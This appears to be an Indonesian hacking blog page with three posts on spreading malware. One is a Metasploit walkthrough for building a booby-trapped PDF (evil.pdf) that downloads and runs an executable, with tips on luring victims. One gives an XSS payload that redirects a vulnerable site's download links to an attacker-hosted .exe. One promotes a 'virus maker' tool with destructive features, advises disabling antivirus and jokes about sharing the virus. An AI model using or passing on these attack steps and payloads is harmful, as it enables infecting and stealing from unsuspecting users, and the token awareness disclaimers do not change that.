PandaanHacker

Mungkin sebagian besar orang-orang yg bergelut di bidang IT pernah mendengar ataupun pernah memakai salah satu Framework Development Vulnerability ini,Yup, jika anda belum pernah mengenal apa itu Metasploit silahkan anda mengunjungi situs utamanya yaitu http://metasploit.com dan referensi nya melalui search engine kesukaan anda.
Pada kali ini saya akan menggambarkan salah satu teknik Blackhat dalam memanfaatkan Metasploit sebagai senjata yang powerfull dalam menyebarkan Malicious Code baik itu Trojan, Virus, Botnet, ataupun Rootkit melalui teknik rekayasa social (Social Enginering).
Ok, buat persiapan kita akan mempersiapkan sebuah File PDF dan Virus (Fake).
Untuk file virus palsu kita coba bangun dari sebuah bahasa Visual Basic.Berikut potongan kodenya. Yg mana jika tombol ditekan maka akan menghasilkan tulisan “Selamat Komputer Anda Kena Virus ”

Setelah Virus Palsu, Selanjutnya kita perlu menyiapkan sebuah File e-book untuk media sosial engginering dan Metasploit sebagai Alat untuk meracik kedua file tersebut.Proses Meracik Adonan

1. Download dan Instal metasploit anda
2. Setelah installasi selesai, pilihlah metasploit web yaitu pada Start –> Metasploit Framework –> msfweb
3. Setelah load pilih tab Exploit dan carilah exploit “Adobe PDF Embedded EXE Social Engineering”. Exploit ini dapat berjalan pada Adobe Reader v8.x, v9.x

4. Pilih “windows/download_exec”
5. Selanjutnya kita akan dihadapkan kepada pengaturan standart untuk menkonfigurasi file yang akan diracik.
EXENAME : Path / Directory tempat File Virus berada
ex my linux directory: /home/valencia/contoh_virus.exe
INFILENAME : Path / Directory tempat E-BOOK / PDF berada
ex my linux directory : /home/valencia/ebook_palsu.pdf
FILENAME : Merupakan Output Hasil File
ex: evil.pdf
LAUNCH MESSAGE : Pesan kesalahan yg ditampilkan
ex : To view the encrypted content please tick the
“Do not show this message again” box and press Open.
OUTPUTPATH : Path / Directory tempat File gabungan berada
ex my linux directory: /home/valencia/
URL : Alamat web yg digunakan untuk mendownload executable.
ex : http://site-fake.com/evil_update.pdf
6. Selanjutnya klik tombol Launch Exploit. Jika berhasil maka akan ada file baru yg bernama evil.pdf di path /home/valencia/
Setelah semua adonan selesai diracik saatnya melakukan penyebaran dengan teknik social enginering. File hasil generate yg bernama evil.pdf bisa di Rename dengan judul yg menarik minat seseorang untuk mengeksekusinya, misalnya “ Cara Mendapatkan Uang Gratis Di Internet”.
Ok, ga perlu dijelaskan bagaimana cara menyebarkan, karena saya yakin anda terlalu pintar untuk itu…lolz J
Sekarang kita lihat , bagaimana jika file itu kita eksekusi. Apakah dengan teknik ini file virus palsu dapat berjalan jika e-book itu dijalankan ?



- Setelah di jalankan, file evil.pdf tadi akan menjalankan command prompt dan kemudian menampilkan pesan error sesuai dengan LAUNCH MESSAGE yg kita setting tadi.
- Dan jika kita menutup dialog box dari error tersebut maka program virus palsu yg berada pada badan file evil.pdf tersebut akan dijalankan dan menampilkan pesan.
Dari ilustrasi teknik di atas, mungkin anda akan berpikir jika dulu E-book yg ada di internet bukanlah sesuatu ancaman bagi anda tapi sekarang mereka bisa menjadi ancaman serius bagi keamanan anda.
Coba bayangkan, file yg diselipkan itu adalah sebuah program yang bertugas mencuri data banking seperti Zeus, SpyEye. Saya yakin E-book yang ada dalam PC / Laptop anda sudah masuk ke Recycle Bin (Just Kidding .)Anyway…….sekian bahasan pendek yg bisa saya sampaikan. Moga saja kita dapat lebih aware terhadap ancaman-ancaman yang ada di dunia maya.
Salam……………..

Sahabat semuanya, apa kabar?
Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“PandaanHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:

Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>
Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.
Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.


Semoga artikel di atas bermanfaat

Siapa bilang membuat virus itu susah ?
Sekarang anda bisa membuat virus dari yang paling simple sampe Trojan yang dapat merusak sistem.
Oke, skrg saya akan beri penjelasannya dulu………  Cekidot gan……



1. Informasi Software:

• Software ini dibuat oleh orang Iran. berita tersebut juga belum pasti kebenarannya, tetapi saya mencoba search di google.com dan saya mendapat info yang menyebutkan bahwa software TeraBit Virus Maker adalah asli buatan Iran, dan itu pun dalam versi 3.1 . Dalam versi 3.1 sampai yang sebelumnya, software ini belum support untuk Windows 7, hanya support pada Sistem Operasi sebelum Windows 7, seperti: Windows XP,Vista. Disini saya memiliki Software TeraBit Virus Maker versi 3.2 yang telah support dengan Windows 7.

2. Fungsi Software:

• Software ini berfungsi untuk membuat virus secara instan dengan kemampuan yang bisa kita pilih sendiri sehingga user dapat menggunakannya dengan mudah dan cepat. Di dalam software tersebut telah disediakan fitur-fitur yang bisa kita gunakan dalam pembuatan virus, ada 54 fitur yang bisa kita gunakan, saya hanya akan menyebutkan 15 fitur saja dan untuk fitur yang lain bisa dilihat di gambar. 15 fitur itu adalah:

1. Avoid Opening Calculator
2. Avoid Opening Copy,Move Window
3. Avoid Opening Gpedit
4. Avoid Opening Media Player
5. Avoid Opening Mozzila Firefox
6. Avoid Opening MsConfig
7. Avoid Opening Notepad
8. Avoid Opening Wordpad
9. Avoid Opening Yahoo Messenger
10. Add 30 User Accounts to Windows
11. Always Clean Clipboard
12. Always Log Off
13. Close Internet Explorer Every 10 sec
14. Delete All Files In Desktop
15. Delete All Files In My Documents

File virus ini ber-ekstensi *.exe . Jadi, ketika file virus ini dieksekusi, maka fitur-fitur yang telah ditambahkan, akan berjalan dan mengubah pengaturan system computer anda sesuai dengan fitur yang anda pilih.
Dan ada item-item yang bisa digunakan untuk melengkapi kesempurnaan dari virus yang anda buat, seperti:

• Binder berfungsi untuk mengeksekusi/menjalankan file yang kita kaitkan dengan virus yang anda buat, file yang bisa dikaitkan bisa dalam format apa saja, sperti file gambar, file word, exel, powerpoint, music, notepad, dan lain-lain.

• Fake Error Message berfungsi untuk memunculkan pesan palsu yang kita buat sendiri, dan sub-itemnya ada title, message, dan type. Title isi judul pesan, Message isi dengan pesan kalian sendiri, dan type, pilih tipe yang anda inginkan.

• Run Custom Command (ini belum saya coba sebelumnya)

• Add [ ] fake KB(s) to virus berfungsi untuk menambahkan kapasitas palsu ke dalam file virus tersebut.

• File name after install adalah file yang sebenarnya berjalan, saat file palsu tersebut dieksekusi, disana terdapat tipe/ekstensi *.exe yang bisa digunakan.

• File Icon adalah item yang digunakan untuk memilih icon file virus tersebut.

• File Name adalah item yang digunakan untuk memberi nama pada file tersebut.

• Run Virus with Windows adalah item yang berfungsi untuk menjalankan file pada windows.

• [R] adalah tombol reset, untuk mereset ulang pengaturan yang telah dipilih ke pengaturan defaultnya

• Create Virus berfungsi untuk membuat file virus yang telah kita rancang sebelumnya.

3. Cara Menggunakan Software:

1. Install deepfreeze untuk menjaga agar komputer anda aman.
2. Disable Antivirus anda, karena software ini dianggap sebagai virus oleh antivirus.
3. Jalankan Software tVirusMaker.exe
4. Pilih/ceklist fitur-fitur yang telah disediakan dan pilih item-item yang akan digunakan.
5. Terakhir anda klik Create Virus dan simpan ke direktori anda.
6. File virus siap dijalankan. (*dan bagi-bagi ke teman-teman anda, ‘hahahah…hanya saran’*)

4. Download Software :
Download Link —> DOWNLOAD DISINI


Virus-virus ini juga sangat mudah terdeteksi oleh antivirus, kebanyakan akan berhasil apabila target korban tidak menggunakan antivirus / antivirusnya disable. Tetapi tidak ada salahnya untuk dicoba kan?
Selamat mencoba & jangan disalah gunakan